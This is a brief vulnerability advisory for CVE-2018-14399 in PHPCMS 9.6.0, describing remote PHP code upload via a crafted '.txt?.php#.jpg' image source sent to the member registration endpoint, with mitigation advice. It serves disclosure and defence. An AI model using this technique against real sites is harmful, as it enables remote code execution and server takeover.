CVE-2018-14399

Name of the Vulnerable Software and Affected Versions PHPCMS version 9.6.0

Description The issue allows remote attackers to upload and execute arbitrary PHP code. This can be achieved by sending a .txt?.php#.jpg URI in the SRC attribute of an IMG element within info[content] JSON data to the "index.php?m=member&c=index&a=register" API endpoint.

Recommendations For PHPCMS version 9.6.0, consider restricting access to the index.php?m=member&c=index&a=register API endpoint to minimize the risk of exploitation. Avoid using the info[content] JSON data in this endpoint until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.